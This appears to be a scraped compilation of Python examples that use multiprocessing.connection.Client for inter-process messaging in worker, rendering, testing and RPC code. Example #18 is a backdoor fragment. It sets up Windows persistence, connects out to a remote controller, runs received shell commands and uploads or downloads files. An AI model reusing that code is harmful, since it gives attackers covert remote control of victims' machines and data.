Example #1
File: main.py Project: mmatena/del8
def main(_):
    logging.info("Longleaf worker started.")
    logging.info(
        f"Waiting to connect to {FLAGS.listener_host}:{FLAGS.listener_port}")

    conn = connection.Client((FLAGS.listener_host, FLAGS.listener_port))
    logging.info(f"Connected to {FLAGS.listener_host}:{FLAGS.listener_port}")

    conn.send("CONNECTED")

    while True:
        try:
            logging.info("Waiting for message from supervisor.")
            msg = conn.recv()
            logging.info("Message received.")
        except EOFError:
            logging.warning("[NOT FATAL] EOFError on conn.recv()")
            break

        msg = serialization.deserialize(msg)
        logging.info(f"Incoming msg: {msg}")

        if msg.type == messages.MessageType.PROCESS_ITEM:
            exe_item = msg.content.execution_item
            if isinstance(exe_item, str):
                exe_item = serialization.deserialize(exe_item)

            logging.info(
                f"Processing execution item: {serialization.serialize(exe_item, indent=2)}"
            )
            entrypoint.worker_run(**exe_item.worker_run_kwargs)

            response = messages.Message(
                type=messages.MessageType.PROCESS_ITEM,
                content=messages.ItemProcessed(
                    status=messages.ResponseStatus.SUCCESS),
            )
            logging.info("Successfully processed execution item")

            ser_res = serialization.serialize(response)
            logging.info("Sending response to supervisor.")
            conn.send(ser_res)

            logging.info("Clearing keras session.")
            tf.keras.backend.clear_session()

        else:
            raise ValueError(f"Message received with unknown type {msg.type}.")
Example #2
 def _finalize_host(address, authkey, fcleanup, rcleanup):
     """ Sends a shutdown message and cleans up tunnels. """
     mgr_ok = OpenMDAO_Proxy.manager_is_alive(address)
     if mgr_ok:
         conn = connection.Client(address, authkey=authkey)
         try:
             managers.dispatch(conn, None, 'shutdown')
         except EOFError:
             pass
         finally:
             conn.close()
     if fcleanup is not None:
         fcleanup[0](*fcleanup[1:], **dict(keep_log=not mgr_ok))
     if rcleanup is not None:
         rcleanup[0](*rcleanup[1:], **dict(keep_log=not mgr_ok))
Example #3
def send(objects: List[Any]) -> None:
    """Send objects from an iterable to a process running session().

    Raise ConnectionRefusedError if session() is not running.
    """
    # Reading the address file, connecting to a Windows named pipe and
    # connecting to an AF_UNIX socket all raise FileNotFoundError :D
    try:
        with _ADDRESS_FILE.open('r') as file:
            address = file.read().strip()
        client = connection.Client(address)
    except FileNotFoundError:
        raise ConnectionRefusedError("session() is not running") from None

    with client:
        for message in objects:
            client.send(message)
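
For context, a sketch of the session() side this function expects: bind a Listener on a default file-based address (an AF_UNIX socket or Windows named pipe, matching the comment above), publish it via _ADDRESS_FILE, and drain objects until the sender closes. It assumes _ADDRESS_FILE is the same pathlib.Path used by send(); the handle callback is a placeholder:

from multiprocessing import connection

def session(handle):
    with connection.Listener() as listener:  # OS-chosen AF_UNIX/AF_PIPE address
        _ADDRESS_FILE.write_text(str(listener.address))
        with listener.accept() as client:
            try:
                while True:
                    handle(client.recv())  # process one object sent by send()
            except EOFError:
                pass  # send() closed its end of the connection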
Example #4
def listvars():
    global glob_hosts
    if not glob_hosts:
        print "\n".join(sorted(glob_vals.keys()))
        return
    mylist = []
    for host in glob_hosts:
        conn = connection.Client(
            host,
            authkey=PROJECT_AUTHKEY,
        )
        conn.send(REQUEST_LIST())
        reply = conn.recv()
        conn.close()
        mylist.extend(reply.items)
    print("\n".join(sorted(mylist)))
    return
Example #5
        def read_thread():
            """
            Read-thread body. Attempts to connect to a Terraria server
            controller and listens for incoming data. This thread stays alive
            until the process closes.
            """

            while True:

                # First connect to the server
                try:
                    self.__conn = mpc.Client(('localhost', port),
                                             authkey=SECRET)
                    self.__botchan_send('Terraria server manager connected!')

                # If the connection stays unassigned or gets closed here, the
                # read loop below is skipped
                except (EOFError, ConnectionRefusedError, ConnectionResetError,
                        BrokenPipeError):
                    if self.__conn is not None:
                        self.__conn.close()
                        time.sleep(10)  # Wait a reasonable amount of time and check again

                # Read loop
                while self.__conn and (not self.__conn.closed):

                    # Try to read and direct messages appropriately
                    try:
                        line = self.__conn.recv()
                        [status, msg] = line.split('|', 1)
                        status = status.strip()
                        if status == 'LOG':
                            self.__logchan_send(msg)
                        elif status == 'OK':
                            self.__botchan_send(msg)
                        else:
                            self.__botchan_send(f'{status}: {msg}')

                    # Close the connection so we end the loop and try to reconnect at the top
                    except (EOFError, ConnectionResetError, BrokenPipeError):
                        self.__botchan_send(
                            'ERR: The Terraria server manager crashed. Attempting '
                            'to reconnect')
                        self.__conn.close()
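
The read loop above expects each payload to be a 'STATUS|message' string, split with split('|', 1). A sketch of a sender matching that framing; only the format itself comes from the code above, everything else is assumed:

from multiprocessing import connection

def serve(port, secret):
    with connection.Listener(('localhost', port), authkey=secret) as listener:
        conn = listener.accept()
        conn.send('OK|Terraria server manager online')  # routed to the bot channel
        conn.send('LOG|world autosaved')                # routed to the log channel
        conn.close()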
Example #6
def procserver(session_export, conn):
    # init logging system
    rlog = multiprocessing.log_to_stderr()
    rlog.setLevel(session_export['logLevel'])

    # make a real session from the "session" we got
    ssn = import_session(rlog, session_export)

    if isinstance(conn, Sequence):
        conn = connection.Client(conn[:2], authkey=conn[2])

    event = SubprocessEvent(ssn.testLoader,
                            ssn.testResult,
                            ssn.testRunner,
                            ssn.plugins,
                            conn)
    res = ssn.hooks.startSubprocess(event)
    if event.handled and not res:
        conn.send(None)
        conn.close()
        ssn.hooks.stopSubprocess(event)
        return
    # receive and run tests
    executor = event.executeTests
    for testid in gentests(conn):
        if testid is None:
            break
        # XXX to handle weird cases like layers, need to
        # deal with the case that testid is something other
        # than a simple string.
        test = event.loader.loadTestsFromName(testid)
        # XXX Is there a need to protect the loop? try/except?
        rlog.debug("Execute test %s (%s)", testid, test)
        executor(test, event.result)
        events = [e for e in ssn.hooks.flush()]
        try:
            conn.send((testid, events))
            rlog.debug("Log for %s returned", testid)
        except:
            rlog.exception("Fail sending event %s: %s" % (testid, events))
            # Send empty event list to unblock the conn.recv on main process.
            conn.send((testid, []))
    conn.send(None)
    conn.close()
    ssn.hooks.stopSubprocess(event)
Example #7
def load(variable):
    global glob_vals
    if variable in glob_vals:
        return glob_vals[variable]
    for host in glob_hosts:
        conn = connection.Client(
            host,
            authkey=PROJECT_AUTHKEY,
        )
        conn.send(REQUEST_GET_VALUE(variable))
        reply = conn.recv()
        conn.close()
        if isinstance(reply, I_DONT_KNOW):
            continue
        elif isinstance(reply, RESPONSE_GET_VALUE):
            return reply.value
    print("Error: Interpreter: no variable named {}".format(variable))
    raise ValueError
Example #8
 def _clientSend(self, data):
     try:
         client = multi_con.Client(address=self._address,
                                   authkey=self._authKey)
         client.send(data)
         client.close()
     except ConnectionRefusedError:
         traceLog(
             LogLevel.ERROR,
             "ComManager: Client connection refused. Listener likely not started"
         )
     except multi_con.AuthenticationError:
         traceLog(LogLevel.WARNING,
                  "ComManager: Client authentication error")
     except Exception as e:
         traceLog(
             LogLevel.ERROR, "ComManager: Client exception [%s]: %s" %
             (str(type(e).__name__), str(e)))
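
The two except clauses map onto listener-side behavior: ConnectionRefusedError means nothing is bound at the address, and AuthenticationError means the two ends disagree on the key. A minimal matching listener, mirroring the snippet's import alias; this is a sketch, not the project's actual listener:

import multiprocessing.connection as multi_con

def listen(address, auth_key):
    # authkey must be the same bytes value on both ends, otherwise
    # accept()/Client() raise multi_con.AuthenticationError.
    with multi_con.Listener(address, authkey=auth_key) as listener:
        while True:
            with listener.accept() as conn:
                print(conn.recv())  # one message per connection, as _clientSend sends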
Example #9
def store(variable, expression):
    global glob_vals
    global glob_hosts
    if variable in glob_vals:
        glob_vals[variable] = expression
    # try to set on all other hosts
    for host in glob_hosts:
        conn = connection.Client(
            host,
            authkey=PROJECT_AUTHKEY,
        )
        conn.send(REQUEST_SET_VALUE(variable, expression))
        reply = conn.recv()
        conn.close()
        if isinstance(reply, I_DONT_KNOW):
            continue
        elif isinstance(reply, ACK):
            return
    # if that fails, set locally
    glob_vals[variable] = expression
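
Examples #4, #7 and #9 share one request/reply protocol per host: REQUEST_LIST, REQUEST_GET_VALUE and REQUEST_SET_VALUE are answered with reply objects (a list reply with an items attribute, RESPONSE_GET_VALUE, ACK, or I_DONT_KNOW). A hedged sketch of the host side, reusing the same message classes; the RESPONSE_LIST name and the variable/expression attributes are guesses:

from multiprocessing import connection

def serve_host(address, values):
    with connection.Listener(address, authkey=PROJECT_AUTHKEY) as listener:
        while True:
            with listener.accept() as conn:
                request = conn.recv()
                if isinstance(request, REQUEST_LIST):
                    conn.send(RESPONSE_LIST(items=list(values)))  # assumed reply class
                elif isinstance(request, REQUEST_GET_VALUE):
                    if request.variable in values:
                        conn.send(RESPONSE_GET_VALUE(values[request.variable]))
                    else:
                        conn.send(I_DONT_KNOW())
                elif isinstance(request, REQUEST_SET_VALUE):
                    if request.variable in values:
                        values[request.variable] = request.expression
                        conn.send(ACK())
                    else:
                        conn.send(I_DONT_KNOW())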
Example #10
    def from_address(cls, address, authkey, host):
        """
        Return manager given an address.

        address: (ip_addr, port) or string referring to pipe.
            Address to connect to.

        authkey: string
            Authorization key.

        host: :class:`Host`
            Host we're managing.
        """
        if host.tunnel_outgoing:
            _LOGGER.debug('Client setting up tunnel for %s:%s', host.hostname,
                          address[1])
            address, cleanup = setup_tunnel(host.hostname,
                                            address[1],
                                            identity=host.identity_filename)
        else:
            cleanup = None

        manager = cls(address, authkey)
        _LOGGER.debug('Client connecting to server at %s' % (address, ))
        conn = connection.Client(address, authkey=authkey)
        try:
            managers.dispatch(conn, None, 'dummy')
        finally:
            conn.close()
        manager._state.value = managers.State.STARTED
        manager._name = 'Host-%s:%s' % manager.address
        manager.shutdown = util.Finalize(manager,
                                         HostManager._finalize_host,
                                         args=(manager._address,
                                               manager._authkey, cleanup,
                                               host.reverse_cleanup),
                                         exitpriority=-10)
        return manager
Example #11
    def serve_events(self):
        self.logger.info("started thread server %s", self.name)
        while not self.stop_executing:
            # time.sleep(3)
            for e in self.events:
                # if not e.is_real_owner:
                #     if not e.sent_at or (e.sent_at and (self.timer - e.sent_at) > 1000):
                #         e.sent_at = self.timer
                #         for a in self.all_address:
                #             conn = connection.Client(a, authkey=AUTH_KEY)
                #             conn.send(e.get_normalised_data())
                #             conn.close()
                if e.is_real_owner and not e.sent_at:
                    # e.acknowledged = True
                    e.sent_at = self.timer
                    for i, a in enumerate(self.all_address):
                        if i == self.id:
                            continue

                        conn = connection.Client(a, authkey=AUTH_KEY)
                        conn.send(e.get_normalised_data())
                        conn.close()

        self.logger.info("stopped serving events")
Example #12
def runner(data):
    assert 'SOCKET' in os.environ, 'SOCKET env var is not set'
    assert 'AGENT_CONTROLLER_URL' in os.environ, 'Missing AGENT_CONTROLLER_URL'
    assert 'AGENT_GID' in os.environ, 'Missing AGENT_GID'
    assert 'AGENT_NID' in os.environ, 'Missing AGENT_NID'

    socket = os.environ['SOCKET']
    con = connection.Client(socket)

    # Hash will get processed by the daemon as follows
    # It will contact the agentcontroller to retrieve the cached script
    # and execute it normally.
    # we also collect the controller variables from env vars.
    controller = {
        'gid': os.environ['AGENT_GID'],
        'nid': os.environ['AGENT_NID'],
        'url': os.environ['AGENT_CONTROLLER_URL'],
        'name': os.environ['AGENT_CONTROLLER_NAME'],
        'ca': os.environ.get('AGENT_CONTROLLER_CA', None),
        'client_cert': os.environ.get('AGENT_CONTROLLER_CLIENT_CERT', None),
        'client_cert_key': os.environ.get('AGENT_CONTROLLER_CLIENT_CERT_KEY',
                                          None)
    }

    exec_data = {
        'data': data['args'],  # script args
        'hash': data.get('hash', None),
        'controller': controller
    }

    con.send(exec_data)

    code = reader.readResponseToEnd(con)
    con.close()

    sys.exit(code)
Example #13
def sendTo(args):
    conn = connection.Client(address, authkey=b"hello")  # authkey must be bytes
    conn.send(args)
    print("message out from {}".format(name))
Example #14
def main(pipeline_path, connection_addresses, shared_dic, log_path, debug_mode):
    log_level = log.DEBUG if debug_mode else log.INFO
    setup_logging(log_path, log_level)
    log.info('DEBUG MODE: {}'.format(debug_mode))

    # Trying to change process priority in Linux seems to hang Malt for some users
    if sys.platform == 'win32':
        import psutil
        psutil.Process().nice(psutil.REALTIME_PRIORITY_CLASS)

    log.info('CONNECTIONS:')
    connections = {}
    for name, address in connection_addresses.items():
        log.info('Name: {} Address: {}'.format(name, address))
        connections[name] = connection.Client(address)
    
    glfw.ERROR_REPORTING = True
    glfw.init()

    glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 4)
    glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 1)
    
    window = glfw.create_window(256, 256, 'Malt', None, None)
    glfw.make_context_current(window)
    # Don't hide for better OS/Drivers schedule priority
    #glfw.hide_window(window)
    # Minimize instead:
    glfw.iconify_window(window)

    glfw.swap_interval(0)

    log_system_info()
    
    log.info('INIT PIPELINE: ' + pipeline_path)

    pipeline_dir, pipeline_name = os.path.split(pipeline_path)
    if pipeline_dir not in sys.path:
        sys.path.append(pipeline_dir)
    module_name = pipeline_name.split('.')[0]
    module = __import__(module_name)

    pipeline_class = module.PIPELINE
    pipeline_class.SHADER_INCLUDE_PATHS.append(pipeline_dir)
    pipeline = pipeline_class()

    params = pipeline.get_parameters()
    connections['PARAMS'].send(params)

    viewports = {}
    last_exception = ''
    repeated_exception = 0

    while glfw.window_should_close(window) == False:
        
        try:
            profiler = cProfile.Profile()
            profiling_data = io.StringIO()
            global PROFILE
            if PROFILE:
                profiler.enable()
            
            start_time = time.perf_counter()

            glfw.poll_events()

            while connections['MATERIAL'].poll():
                msg = connections['MATERIAL'].recv()
                log.debug('COMPILE MATERIAL : {}'.format(msg))
                path = msg['path']
                search_paths = msg['search_paths']
                material = Bridge.Material.Material(path, pipeline, search_paths)
                connections['MATERIAL'].send(material)
            
            while connections['MESH'].poll():
                msg = connections['MESH'].recv()
                msg_log = copy.copy(msg)
                msg_log['data'] = None
                log.debug('LOAD MESH : {}'.format(msg_log))
                load_mesh(msg)
            
            while connections['TEXTURE'].poll():
                msg = connections['TEXTURE'].recv()
                log.debug('LOAD TEXTURE : {}'.format(msg))
                name = msg['name']
                resolution = msg['resolution']
                channels = msg['channels']
                buffer_name = msg['buffer_name']
                sRGB = msg['sRGB']
                w,h = resolution
                size = w*h*channels
                buffer = ipc.SharedMemoryRef(buffer_name, size*ctypes.sizeof(ctypes.c_float))
                float_buffer = (ctypes.c_float*size).from_address(buffer.c.data)
                load_texture(name, resolution, channels, float_buffer, sRGB)
                connections['TEXTURE'].send('COMPLETE')
            
            while connections['GRADIENT'].poll():
                msg = connections['GRADIENT'].recv()
                msg_log = copy.copy(msg)
                msg_log['pixels'] = None
                log.debug('LOAD GRADIENT : {}'.format(msg_log))
                name = msg['name']
                pixels = msg['pixels']
                nearest = msg['nearest']
                load_gradient(name, pixels, nearest)
            
            #TODO: Bad workaround to make sure the scene assets are loaded
            if connections['RENDER'].poll():
                needs_loading = False
                for key in ['MATERIAL','MESH','TEXTURE','GRADIENT']:
                    if connections[key].poll():
                        needs_loading = True
                if needs_loading:
                    continue
            
            setup_viewports = {}
            while connections['RENDER'].poll():
                msg = connections['RENDER'].recv()
                log.debug('SETUP RENDER : {}'.format(msg))
                setup_viewports[msg['viewport_id']] = msg

            for msg in setup_viewports.values():
                viewport_id = msg['viewport_id']
                resolution = msg['resolution']
                scene = msg['scene']
                scene_update = msg['scene_update']
                buffer_names = msg['buffer_names']
                w,h = resolution
                buffers = {}
                for key, buffer_name in buffer_names.items():
                    if buffer_name:
                        buffers[key] = ipc.SharedMemoryRef(buffer_name, w*h*4*4)

                if viewport_id not in viewports:
                    viewports[viewport_id] = Viewport(pipeline_class(), viewport_id == 0)

                viewports[viewport_id].setup(buffers, resolution, scene, scene_update)
                shared_dic[(viewport_id, 'FINISHED')] = False
            
            active_viewports = {}
            render_finished = True
            for v_id, v in viewports.items():
                if v.needs_more_samples:
                    active_viewports[v_id] = v
                has_finished = v.render()
                if has_finished == False:
                    render_finished = False
                shared_dic[(v_id, 'READ_RESOLUTION')] = v.read_resolution
                if has_finished and shared_dic[(v_id, 'FINISHED')] == False:
                    shared_dic[(v_id, 'FINISHED')] = True
            
            if render_finished:
                glfw.swap_interval(1)
            else:
                glfw.swap_interval(0)
            glfw.swap_buffers(window)

            if len(active_viewports) > 0:
                stats = ''
                for v_id, v in active_viewports.items():
                    stats += "Viewport ({}):\n{}\n\n".format(v_id, v.get_print_stats())
                shared_dic['STATS'] = stats
                log.debug('STATS: {} '.format(stats))
            
            if PROFILE:
                profiler.disable()
                stats = pstats.Stats(profiler, stream=profiling_data)
                stats.strip_dirs()
                stats.sort_stats(pstats.SortKey.CUMULATIVE)
                stats.print_stats()
                if active_viewports:
                    log.debug(profiling_data.getvalue())
        except (ConnectionResetError, EOFError):
            #Connection Lost
            break
        except:
            import traceback
            exception = traceback.format_exc()
            if exception != last_exception:
                log.error(exception)
                repeated_exception = 0
                last_exception = exception
            else:
                if repeated_exception in (1,10,100,1000,10000,100000):
                    log.error('(Repeated {}+ times)'.format(repeated_exception))
                repeated_exception += 1

    glfw.terminate()
Example #15
def open_window():
    client = connection.Client(address, authkey=b"limits auth")
    client.send(b"open_window")
Example #16
 def run(self):
     """Instantiates a connection.Client."""
     self._client = connection.Client(self._address)
Example #17
File: Server.py Project: bnpr/Malt
def main(pipeline_path, viewport_bit_depth, connection_addresses, shared_dic,
         lock, log_path, debug_mode, plugins_paths):
    log_level = LOG.DEBUG if debug_mode else LOG.INFO
    setup_logging(log_path, log_level)
    LOG.info('DEBUG MODE: {}'.format(debug_mode))

    LOG.info('CONNECTIONS:')
    connections = {}
    for name, address in connection_addresses.items():
        LOG.info('Name: {} Address: {}'.format(name, address))
        connections[name] = connection.Client(address)

    glfw.ERROR_REPORTING = True
    glfw.init()

    glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 4)
    glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 1)
    glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)

    window = glfw.create_window(256, 256, 'Malt', None, None)
    glfw.make_context_current(window)
    # Don't hide for better OS/Drivers schedule priority
    #glfw.hide_window(window)
    # Minimize instead:
    glfw.iconify_window(window)

    glfw.swap_interval(0)

    log_system_info()

    LOG.info('INIT PIPELINE: ' + pipeline_path)

    pipeline_dir, pipeline_name = os.path.split(pipeline_path)
    if pipeline_dir not in sys.path:
        sys.path.append(pipeline_dir)
    module_name = pipeline_name.split('.')[0]
    module = __import__(module_name)

    pipeline_class = module.PIPELINE
    pipeline_class.SHADER_INCLUDE_PATHS.append(pipeline_dir)
    plugins = []
    for dir in plugins_paths:
        plugins += load_plugins_from_dir(dir)
    pipeline = pipeline_class(plugins)

    params = pipeline.get_parameters()
    graphs = pipeline.get_graphs()
    outputs = pipeline.get_render_outputs()
    connections['MAIN'].send({
        'msg_type': 'PARAMS',
        'params': params,
        'graphs': graphs,
        'outputs': outputs
    })

    viewports = {}
    last_exception = ''
    repeated_exception = 0

    while glfw.window_should_close(window) == False:

        try:
            profiler = cProfile.Profile()
            profiling_data = io.StringIO()
            global PROFILE
            if PROFILE:
                profiler.enable()

            start_time = time.perf_counter()

            glfw.poll_events()

            while connections['REFLECTION'].poll():
                msg = connections['REFLECTION'].recv()
                if msg['msg_type'] == 'SHADER REFLECTION':
                    LOG.debug('REFLECT SHADER : {}'.format(msg))
                    paths = msg['paths']
                    results = {}
                    from Malt.GL.Shader import glsl_reflection, shader_preprocessor
                    for path in paths:
                        root_path = os.path.dirname(path)
                        src = '#include "{}"\n'.format(path)
                        src = shader_preprocessor(src, [root_path])
                        reflection = glsl_reflection(src, root_path)
                        reflection['paths'] = set([path])
                        for struct in reflection['structs'].values():
                            reflection['paths'].add(struct['file'])
                        for function in reflection['functions'].values():
                            reflection['paths'].add(function['file'])
                        results[path] = reflection
                    connections['REFLECTION'].send(results)
                if msg['msg_type'] == 'GRAPH RELOAD':
                    graph_types = msg['graph_types']
                    for type in graph_types:
                        pipeline.graphs[type].setup_reflection()
                    for viewport in viewports.values():
                        viewport.pipeline.graphs = pipeline.graphs
                    graphs = pipeline.get_graphs()
                    connections['REFLECTION'].send(graphs)

            while connections['MAIN'].poll():
                msg = connections['MAIN'].recv()

                if msg['msg_type'] == 'MATERIAL':
                    LOG.debug('COMPILE MATERIAL : {}'.format(msg))
                    path = msg['path']
                    search_paths = msg['search_paths']
                    custom_passes = msg['custom_passes']
                    material = Bridge.Material.Material(
                        path, pipeline, search_paths, custom_passes)
                    connections['MAIN'].send({
                        'msg_type': 'MATERIAL',
                        'material': material
                    })

                if msg['msg_type'] == 'MESH':
                    msg_log = copy.copy(msg)
                    msg_log['data'] = None
                    LOG.debug('LOAD MESH : {}'.format(msg_log))
                    Bridge.Mesh.load_mesh(msg)

                if msg['msg_type'] == 'TEXTURE':
                    LOG.debug('LOAD TEXTURE : {}'.format(msg))
                    Bridge.Texture.load_texture(msg)

                if msg['msg_type'] == 'GRADIENT':
                    msg_log = copy.copy(msg)
                    msg_log['pixels'] = None
                    LOG.debug('LOAD GRADIENT : {}'.format(msg_log))
                    name = msg['name']
                    pixels = msg['pixels']
                    nearest = msg['nearest']
                    Bridge.Texture.load_gradient(name, pixels, nearest)

                if msg['msg_type'] == 'RENDER':
                    LOG.debug('SETUP RENDER : {}'.format(msg))
                    viewport_id = msg['viewport_id']
                    resolution = msg['resolution']
                    scene = msg['scene']
                    scene_update = msg['scene_update']
                    new_buffers = msg['new_buffers']
                    renderdoc_capture = msg['renderdoc_capture']

                    if viewport_id not in viewports:
                        bit_depth = viewport_bit_depth if viewport_id != 0 else 32
                        viewports[viewport_id] = Viewport(
                            pipeline_class(plugins), viewport_id == 0,
                            bit_depth)

                    viewports[viewport_id].setup(new_buffers, resolution,
                                                 scene, scene_update,
                                                 renderdoc_capture)
                    shared_dic[(viewport_id, 'FINISHED')] = False
                    shared_dic[(viewport_id, 'SETUP')] = True

            active_viewports = {}
            render_finished = True
            for v_id, v in viewports.items():
                if v.needs_more_samples:
                    active_viewports[v_id] = v
                has_finished = v.render()
                if has_finished == False:
                    render_finished = False
                shared_dic[(v_id, 'READ_RESOLUTION')] = v.read_resolution
                if has_finished and shared_dic[(v_id, 'FINISHED')] == False:
                    shared_dic[(v_id, 'FINISHED')] = True

            if render_finished:
                glfw.swap_interval(1)
            else:
                glfw.swap_interval(0)
            glfw.swap_buffers(window)

            if len(active_viewports) > 0:
                stats = ''
                for v_id, v in active_viewports.items():
                    stats += "Viewport ({}):\n{}\n\n".format(
                        v_id, v.get_print_stats())
                shared_dic['STATS'] = stats
                LOG.debug('STATS: {} '.format(stats))

            if PROFILE:
                profiler.disable()
                stats = pstats.Stats(profiler, stream=profiling_data)
                stats.strip_dirs()
                stats.sort_stats(pstats.SortKey.CUMULATIVE)
                stats.print_stats()
                if active_viewports:
                    LOG.debug(profiling_data.getvalue())
        except (ConnectionResetError, EOFError):
            #Connection Lost
            break
        except:
            import traceback
            exception = traceback.format_exc()
            if exception != last_exception:
                LOG.error(exception)
                repeated_exception = 0
                last_exception = exception
            else:
                if repeated_exception in (1, 10, 100, 1000, 10000, 100000):
                    LOG.error(
                        '(Repeated {}+ times)'.format(repeated_exception))
                repeated_exception += 1

    glfw.terminate()
Example #18
        if command.startswith("cd"):
            os.chdir(command.split(' ')[1])
            results = b"[+] Changed into: " + os.getcwd().encode()
        elif command.startswith("download"):
            filepath = command.split(' ')[1]
            results = get_file_contents(filepath)
        elif command.startswith("upload"):
            filename = command.split(' ')[1].split('/')[-1]
            conn.send_bytes(b"Ready")
            file_contents = conn.recv_bytes()
            if not file_contents.startswith(b"Failed"):
                write_file(filename, file_contents)
            return
        else:
            results = check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)
    except:
        results = b"[-] Failed to execute " + command.encode()

    conn.send_bytes(results)

try:
    become_windows_persistent()
    open_windows_data_file()
    with connection.Client((address, port), authkey=key) as conn:
        while True:
            command = conn.recv()
            execute(conn, command)
except:
    sys.exit()

Example #19
import multiprocessing as mp
import multiprocessing.connection as mpc
import threading
import os
import sys

from dotenv import load_dotenv

# Load Env
load_dotenv()
SECRET = str.encode(os.getenv('SECRET'))

# Connect
address = ('localhost', int(sys.argv[1]))
conn = mpc.Client(address, authkey=SECRET)


def read_thread():
    while not conn.closed:
        line = conn.recv()
        print(line, end='')


reader = threading.Thread(target=read_thread)
reader.daemon = True
reader.start()

cmd = 'x'
while cmd:
    cmd = input()
    conn.send(cmd)
Example #20

if args.path is None and not args.stop:
    parser.print_usage()
    exit()

clip_to_play = args.path

if not args.stop:
    playing_process = multiprocessing.Process(target=play)
    playing_process.start()

time.sleep(0.2)

try:
    with ipc.Client(file_mutex_path) as conn:
        conn.send(stop_command)
except:
    pass
if args.stop:
    exit(0)

for i in range(0,10):
    try:
        with ipc.Listener(file_mutex_path) as srv:
            with srv.accept() as conn:
                if conn.recv() == stop_command:
                    playing_process.terminate()
                else:
                    print("wtf is this", file=sys.stderr)
    except OSError as e:
Example #21
 def fake_client(address):
     client = connection.Client(address)
     time.sleep(10)
     client.close()
Example #22
class RPCProxy:
    def __init__(self, connection):
        self._connection = connection

    def __getattr__(self, name):
        def do_rpc(*args, **kwargs):
            self._connection.send(pickle.dumps((name, args, kwargs)))
            result = pickle.loads(self._connection.recv())
            if isinstance(result, Exception):
                raise result
            return result

        return do_rpc


if __name__ == '__main__':
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument('mod', type=str, help="server or proxy")
    args = parser.parse_args()

    mod = args.mod

    if mod == 'server':
        handler = RPCHandler()
        handler.register(add)
        handler.register(now)
        server = RPCServer(handler, ("", 20001), b"rpc")
        server.serve_forever()
    elif mod == 'proxy':
        client = connection.Client(address=("localhost", 20001), authkey=b"rpc")
        proxy = RPCProxy(client)
        print(proxy.add(1, 2))
        print(proxy.now())
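
RPCHandler and RPCServer are used above but not shown. A compact sketch consistent with the pickle framing in do_rpc, where the client sends a pickled (name, args, kwargs) tuple and receives a pickled result or Exception instance; class names follow the snippet, the internals are assumptions:

import pickle
from multiprocessing.connection import Listener

class RPCHandler:
    def __init__(self):
        self._functions = {}

    def register(self, func):
        self._functions[func.__name__] = func

    def handle_connection(self, conn):
        try:
            while True:
                # Mirror of do_rpc: unpickle (name, args, kwargs), run, reply
                name, args, kwargs = pickle.loads(conn.recv())
                try:
                    result = self._functions[name](*args, **kwargs)
                    conn.send(pickle.dumps(result))
                except Exception as e:
                    conn.send(pickle.dumps(e))  # the proxy re-raises this
        except EOFError:
            pass

class RPCServer:
    def __init__(self, handler, address, authkey):
        self._handler = handler
        self._listener = Listener(address, authkey=authkey)

    def serve_forever(self):
        while True:
            client = self._listener.accept()
            self._handler.handle_connection(client)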
Example #23
 def _send_message(self, msg):
     conn = connection.Client(self._address, self._family, authkey=self._authkey)
     try:
         conn.send(msg)
     finally:
         conn.close()
Example #24
 def __init__(self, host='localhost', port=6001, authkey=b'password'):
     self.conn = connection.Client((host, port), authkey=authkey)
Example #25
from config import ADDRESS

interactive = "--pickle" not in sys.argv

if interactive:
    print('[CCCC  OOOO  MM  MM  MM  MM   AA   N  N]')
    print('[C     O  O  M MM M  M MM M  A  A  NN N]')
    print('[C     O  O  M MM M  M MM M  AAAA  N NN]')
    print('[CCCC  OOOO  M    M  M    M  A  A  N  N]')
    print()
    print("Welcome to comman cli")

run = True
while run:
    try:
        with mpc.Client(ADDRESS, family='AF_UNIX') as client:
            inp = shlex.split(input())
            client.send(inp)
            response = client.recv()
            if interactive:
                print(*response, sep=' ')
            else:
                print(pickle.dumps(response))
            run = inp[0].upper() not in ('EXIT', 'STOP')

    except Exception as e:
        if interactive:
            print('AN ERROR OCCURRED: ' + type(e).__name__)
        else:
            print(pickle.dumps(e))
Example #26
 def fake_client(address):
     client = connection.Client(address)
     time.sleep(self.plugin.testRunTimeout)
     client.close()
Example #27
def sendTo(args):
    conn = connection.Client(address, authkey=b"hello")  # authkey must be bytes
    conn.send(args)
Example #28
def main(args):
    try:
        __assertSingleInstance()
        parser = option_parser()
        args = parser.parse_args(args=args)

        # Override user and group if called with --user and --group.
        constants.VDSM_USER = args.user
        constants.VDSM_GROUP = args.group

        # Override storage-repository, used to verify file access.
        sc.REPO_DATA_CENTER = args.data_center
        sc.REPO_MOUNT_DIR = os.path.join(args.data_center, sc.DOMAIN_MNT_POINT)

        try:
            logging.config.fileConfig(args.logger_conf,
                                      disable_existing_loggers=False)
        except Exception as e:
            raise FatalError("Cannot configure logging: %s" % e)

        log = logging.getLogger("SuperVdsm.Server")
        sockfile = args.sockfile
        pidfile = args.pidfile
        if not config.getboolean('vars', 'core_dump_enable'):
            resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
        sigutils.register()
        zombiereaper.registerSignalHandler()

        def bind(func):
            def wrapper(_SuperVdsm, *args, **kwargs):
                return func(*args, **kwargs)
            return wrapper

        if args.enable_gluster:
            for name, func in listPublicFunctions(
                    constants.GLUSTER_MGMT_ENABLED):
                setattr(_SuperVdsm, name, bind(logDecorator(func)))

        for _, module_name, _ in pkgutil.iter_modules(
                [supervdsm_api.__path__[0]]):
            module = importlib.import_module('%s.%s' %
                                             (supervdsm_api.__name__,
                                              module_name))
            api_funcs = [f for _, f in six.iteritems(module.__dict__)
                         if callable(f) and getattr(f, 'exposed_api', False)]
            for func in api_funcs:
                setattr(_SuperVdsm, func.__name__, bind(logDecorator(func)))

        log.debug("Making sure I'm root - SuperVdsm")
        if os.geteuid() != 0:
            sys.exit(errno.EPERM)

        if pidfile:
            pid = str(os.getpid())
            with open(pidfile, 'w') as f:
                f.write(pid + "\n")

        log.debug("Parsing cmd args")
        address = sockfile

        log.debug("Cleaning old socket %s", address)
        if os.path.exists(address):
            os.unlink(address)

        log.debug("Setting up keep alive thread")

        try:
            signal.signal(signal.SIGTERM, terminate)
            signal.signal(signal.SIGINT, terminate)

            log.debug("Creating remote object manager")
            manager = _SuperVdsmManager(address=address, authkey=_AUTHKEY)
